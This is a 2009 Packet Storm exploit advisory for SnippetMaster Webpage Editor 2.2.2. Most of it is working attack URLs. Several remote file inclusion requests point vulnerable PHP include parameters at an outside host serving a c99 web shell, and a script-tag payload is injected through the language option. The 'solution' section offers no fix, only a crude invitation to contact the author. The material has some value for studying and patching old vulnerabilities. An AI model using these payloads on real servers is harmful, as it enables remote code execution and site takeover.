SnippetMaster Webpage Editor RFI / XSS

2009-02-09T00:00:00
ID PACKETSTORM:74775
Type packetstorm
Reporter RoMaNcYxHaCkEr
Modified 2009-02-09T00:00:00

Description

                                        
                                            `# SnippetMaster Webpage Editor 2,2,2 Multiple Vulnes ( Remote File Include , Remote XSS )  
  
# Free Download : http://www.snippetmaster.com/download/manual-install.php  
  
# Download Dezender Script : http://www.mediafire.com/?jv3gz1zwjxm  
  
- Found By : RoMaNcYxHaCkEr  
- My Site : WwW.Sec-Code.CoM  
- My Group : Security - Codes Group  
  
# Exploit [1]:  
  
- Remote File Include :  
  
http://www.sec-code.com/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.sec-code.com/c99.txt?  
  
http://www.sec-code.com/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sec-code.com/c99.txt?  
  
http://www.sec-code.com/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.sec-code.com/c99.txt?  
  
# Exploit [2]:  
  
- Remote XSS :  
  
http://www.sec-code.com/snippetmaster/index.php  
  
By POST method In Option language Inject By This Code :  
  
<script>alert(413156995734)</script>  
  
# Solutions :  
  
Contact With Me I Will Declear All This Fucking Functions  
  
# rXh  
  
# bEST wISHES  
  
`